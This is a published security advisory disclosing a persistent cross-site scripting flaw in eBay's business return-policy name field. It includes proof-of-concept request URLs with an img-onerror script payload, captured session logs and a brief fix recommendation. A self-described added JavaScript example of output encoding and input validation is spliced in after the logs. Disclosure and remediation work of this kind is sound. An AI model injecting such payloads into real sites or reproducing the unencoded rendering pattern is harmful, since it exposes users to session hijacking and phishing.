Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability
Document Title:
===============
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1228

Release Date:
=============
2015-03-25

Vulnerability Laboratory ID (VL-ID):
====================================
1228

Common Vulnerability Scoring System:
====================================
4

Product & Service Introduction:
===============================
eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sales, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements; online event ticket trading; online money transfers; and other services.

(Copy of the Homepage: http://en.wikipedia.org/wiki/EBay )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API).

Vulnerability Disclosure Timeline:
==================================
2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-17: Vendor Notification (eBay Inc - Security Research Team)
2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team)
2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team)
2015-03-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple application-side input validation web vulnerabilities have been discovered in the official Ebay Xcom Policy Web-Application (CMS & API). A persistent input validation web vulnerability allows remote attackers to inject malicious script code into the application side of the affected ebay online service.

The vulnerability is located in the `my ebay account > return policy > edit return policy` module. The vulnerable input is the return policy name value. The persistent script code execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage` and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is medium.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.0. Exploitation of the persistent input validation vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishing attacks, persistent external redirects and malware loads, or persistent manipulation of affected and connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] My Account > Return Policy > Edit Return Policy ( http://www.bizpolicy.ebay.com/businesspolicy/ )

Vulnerable Input(s):
[+] Edit return policy > Policy name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] ebay.com/businesspolicy/manage
[+] Activity Log - Item Listing > Name

Proof of Concept (PoC):
=======================
The application-side cross site web vulnerability can be exploited by remote attackers with a low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Manage your business policies

http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return+Policy+1+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=&_=1395079926788

PoC: Manage your business policies

<a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage">Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a>

--- PoC Session Logs [GET] (Injection) ---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/return?
profileId=52844186015&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage]
Connection[keep-alive]
Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95]
Content-Encoding[gzip]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Date[Mon, 17 Mar 2014 17:59:47 GMT]
Server[eBay Server]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395075357940
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain]
Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBayNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trksid=p5039.m2295.l3917]
Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133]
Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395079046614
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain]
Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPreferences&FClassic=true&ssPageName=STRK:ME:MAPRX]
Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132]
Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]

PoC: Activity log: Return Policy 1 [x]

<div>
<h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2>
<div id="activityLogContent" class="act-cnt">
<table cellpadding="0" cellspacing="0">
<thead><tr>
<th class="first">Date/Time</th>
<th class="second">Action</th>
<th class="third">Description</th>
<th class="fourth">Report</th>
</tr></thead></table>

Note: After the exploitation the activity log service is also compromised.

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[LOAD_NORMAL] Größe des Inhalts[1201] Mime Type[text/html]
Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1]
Connection[keep-alive]
Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96]
Content-Type[text/html; charset=utf-8]
Content-Length[1201]
Date[Mon, 17 Mar 2014 18:29:05 GMT]
Server[eBay Server]
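The rendering defect behind the PoC above is that the stored policy name is concatenated into the manage-list link and the activity-log heading without encoding. The following added example (not from the advisory and not eBay's code; every function and field name is an assumption) shows that unsafe construction next to the context-aware output encoding and input restriction the Solution section recommends, plus a triage helper that pulls the profileName value out of a logged request URL like the one in the session log.

```javascript
// Added example (not eBay's code and not part of the advisory): the two
// rendering sites the advisory names, the policy link on businesspolicy/manage
// and the "Activity log:" heading, first built the unsafe way the PoC markup
// shows, then with context-aware output encoding plus an input whitelist.
// All function and field names here are assumptions.

// Constructed sample: the policy name payload from the advisory's PoC.
const INJECTED_NAME = 'Return Policy 1 "><img src="x" onerror="prompt(23);">';
const SAFE_NAME = 'Return Policy 1';

// Entity-encode a value for HTML element text or a double-quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable pattern: the stored name is concatenated into the markup as-is,
// which is what the PoC <a> element shows.
function renderPolicyLinkUnsafe(policy) {
  return '<a href="return?profileId=' + policy.profileId + '&source=manage">' +
    policy.name + '</a>';
}

// Hardened: the id is URL-encoded for the query string, the finished href is
// attribute-encoded, and the name is encoded as element text.
function renderPolicyLink(policy) {
  const href = 'return?profileId=' + encodeURIComponent(policy.profileId) +
    '&source=manage';
  return '<a href="' + escapeHtml(href) + '">' + escapeHtml(policy.name) + '</a>';
}

// Hardened version of the activity-log heading from the PoC.
function renderActivityLogTitle(name) {
  return '<h2 class="act-title">Activity log: <span id="policy_name">' +
    escapeHtml(name) + '</span></h2>';
}

// Input restriction at the edit endpoint. This is the second layer; the
// encoder above is the control that actually prevents script execution.
const POLICY_NAME_RE = /^[A-Za-z0-9 ._,()\-]{1,64}$/;
function validatePolicyName(name) {
  return typeof name === 'string' && POLICY_NAME_RE.test(name);
}

// Triage helper for a logged injection request: decode the profileName query
// value the way the server would and run the same whitelist over it.
function policyNameFromLoggedUrl(url) {
  const name = new URL(url).searchParams.get('profileName');
  return { name, valid: validatePolicyName(name) };
}

// Lists the element names actually present in a rendered fragment, so the
// effect of the encoding can be checked without a browser.
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([A-Za-z][A-Za-z0-9-]*)/g), m => m[1]);
}

// Constructed request URL shaped like the advisory's injection log entry,
// with prompt(23) in place of the advisory's placeholder.
const LOGGED_URL = 'http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015' +
  '&mode=edit&catId=ALL&profileName=Return+Policy+1+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(23)%3B%3E';

const policy = { profileId: '52844186015', name: INJECTED_NAME };
console.log(tagNames(renderPolicyLinkUnsafe(policy)));  // [ 'a', 'img', 'a' ]
console.log(tagNames(renderPolicyLink(policy)));        // [ 'a', 'a' ]
console.log(policyNameFromLoggedUrl(LOGGED_URL).valid); // false
```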
Reference(s):
http://www.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/return
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPages=1&context={%22status%22%3A%22success_edit_return%22}
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely encoding and parsing the vulnerable policy name item list and the activity log name list. Restrict the input field for special characters and disallow wrong inputs by usage of secure exception handling to prevent executions.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the policy name & activity-log module is estimated as medium. (CVSS 4.0)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ( bkm@evolution-sec.com ) [ www.vulnerability-lab.com ]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( admin@vulnerability-lab.com or research@vulnerability-lab.com ) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™